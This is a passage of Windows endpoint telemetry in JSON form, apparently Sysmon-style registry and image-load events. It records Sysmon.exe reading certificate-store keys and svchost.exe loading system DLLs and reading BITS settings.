"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bitsperf.dll", - "image_path": "C:\\Windows\\System32\\bitsperf.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "wintrust.dll", - "image_path": "C:\\Windows\\System32\\wintrust.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "xmllite.dll", - "image_path": "C:\\Windows\\System32\\xmllite.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\PerfMMFileName", - "registry_value": "PerfMMFileName", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", - "registry_value": "BITS", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 